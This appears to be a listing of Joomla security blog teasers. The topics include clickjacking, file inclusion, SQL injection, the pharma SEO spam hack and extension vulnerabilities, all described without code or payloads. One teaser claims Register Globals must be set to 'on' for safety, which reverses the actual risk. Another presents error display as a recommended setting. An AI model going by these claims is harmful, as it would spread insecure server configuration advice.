security

  • There are numerous other tactics that can be used to break into a computer system, and these usually involve discovering weaknesses or loopholes in the server software's defenses. When a programmer writes software that runs on a web server, he tries to make sure that the software cannot be abused - but it can be very difficult to foresee every eventuality; vandals and hackers are always pushing software to the limit and trying out operations which the software was not designed to handle, in an attempt to discover a way in.

  • It's one of besk keept "secrets" of Joomla 2.5+ - there is a built in password strenght meter, ready to be used. And some are selling for good money - and others offering free plugins - to let you unleash the hidden power. 

    But if you aren't afraid to make your hands dirty with some PHP code, here is how you can do this:

  • As I write this, both Joomla 1.5 and 2.5 have reached their EOL (End Of Life) for long time, and are not developed or supported anymore. This is a huge security risk, so the best advice here is to upgrade your Joomla site to the latest version. But what if you don't have the time/funds to do it right now?

  • Clickjacking is a browser security issue and is a vulnerability across a variety of browsers and platforms. A clickjack takes the form of embedded code or a script that can execute without the user's knowledge, such as clicking on a button that appears to perform another function. The hacker installs an invisible layer over the existing site, hijacking the user's clicks. The suspicious-less user will perform this way actions they never intended to, from apparently inoffensive ones, as following someone on Twitter, to really nasty things, like password, credit card information theft, and anything else you might (not want to) do on a webpage.

  • While working on a new site I discovered, that reCaptcha - which used to be a rock solid part of the CMS since Joomla 1.7 - stopped working. Spent couple of hours googling around and checking and double-checking settings, just to discover, that Google, in his infinite wisdom, has changed things again without notice. The problem affects all Joomla versions from 1.7.1 to 3.2.0.

  • Many of you probably had seen already the red warning in Joomla's admin interface, that you need to have the Register Globals set to "on", otherwise your site is exposed to security treats.

    And also many of you haven't a clue how to do it...

    So, let's see what an average webmaster can do about this problem.

  • Remote File Inclusion (RFI) is a type of vulnerability most often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. His pair, Local File Inclusion or LFI is basically the same technique, used on sites which have been successfully penetrated, and the hacker "planted" his files already on the server.

  • Joomla has everything you may need. Right? If you take a look to the Joomla Extensions site, you may agree with this. But, as always, there may be cases, when the above statement is wrong. For specific need he simplest approach may be to use for specific purposes a standalone script. You can solve the problem - apparently - by using Joomla's wrapper feature, and use your scripts as they where part of your Joomla site. Almost perfect solution you may think... but your scripts are directly accessible by their physical URL, not only through the Joomla interface. What you can do about?

    A lot. And surprisingly easily.

  • Joomla specifies certain settings that are recommended for proper functioning of the system. A list of the recommended and actual settings is displayed when you install Joomla. One of the recommended settings is to have 'Display Errors' switched on. This is very useful when developing and debugging a site, but there is a security vulnerability in PHP (not Joomla, but the language in which Joomla was written) which may allow cross-site-scripting attacks when the display errors option is enabled, if you have a script which produces an error.

  • Joomla, as most CMS's excells by making it easy to manage a website page. Offers a pretty easy way to manage Web-based publishing, format management, history editing and version control, indexing, search, and retrieval. Joomla has an impressive suite of features, but these features require some special considerations.

  • One popular and potentially devastating method of attack against Joomla powered sites is SQL injection. Any web application that makes use of a database usually communicates with the database for necessary functions using a special language known as 'Structured Query Language', or SQL. Joomla, by the way, uses an open source implementation of this language, MySQL.

  • The most comprehensive analysis of trends in the website security finally is out. There are couple of interesting fact worth highlighting.

    Most important is something we expected: Joomla is emerging as the most secure CMS.

  • The Paharma Hack (or Blackhat SEO Spam Hack) is a very elaborated hack wich is often unobserved for the regular visitors - and website owners - because does an ingenious trick: present a different version of your site for the searchengine bots. The site, for a long period of time looks and behaves normally for the regular visitors. This attack is very interesting because it is not visible to the normal user and the spam (generally about Viagra, Nexium, Cialis, etc) only shows up if the user agent is from Google’s crawler (googlebot). Also, the infection is a bit tricky to remove and if not done properly will keep reappearing. It's one of nastiest hacks you might have. We recommend hiring a specialist to remove it, because generally the infection reappears in no time after the site is "cleaned".

  • Also known as two step-authentication or two-step verification, two-factor authentication is an additional security option for online accounts to help keep them safe.

  • The WYSIWYG editors are great additions to the Joomla, and we have lots of them around. They make a webmaster from casual user and can speed up the work of pros. But, sometimes, you find that you cannot enter text into the HTML editor, or click on the HTML editor's toolbar buttons - you are locked out of editing your content!

    What can be more annoying as being unable to edit your own site?

  • By default, across all Joomla versions from Joomla 1.0, through Joomla 1.5, Joomla 1.6 to the Joomla 1.7 the basic structure of default user groups is unchanged. The users are generally sorted in 3 main categories, the unregistered/not logged in users, the registered users with frontend only access and the backend users. The exact naming of these main groups are varying across the different Joomla versions, but the default end level groups are the same. The groups and their core permissions are as follows:

  • Websites take maintenance, and making a habit of performing a little spring cleaning each year can keep a business website running smoothly. The tips below does not apply for Joomla sites alone, any site can benefit from most of these tricks and tips.

  • Even most of security-conscientious Joomla webmasters aren't knowing the existence of this list, maintained at Joomla docs site. There are listed all components with known security problems, and very important to know, the items once appeared on the list aren't removed when the problem is fixed, because large majority of Joomla webmasters aren't upgrading their site as new versions are coming out for the add-ons used. So worth checking, even if the components you use are listed on GREEN - aka fixed -, you may run in trouble, because hackers are knowing the list - and are pro-actively seeking Joomla sites using the insecure add-ons. So you will become easily a target even if you have the secure version...

    Bookmark this link!

    Vulnerable extensions list

  • A client of mine asked this question: "How can I allow registered users to log in and see the site even in offline mode, without giving them Super user privileges?"

  • After moving a site to a new server I found this error in the backend - at least one error per page, but casually even more.

    XML Parsing Error at. Error

    No error number, no line number... What a heck!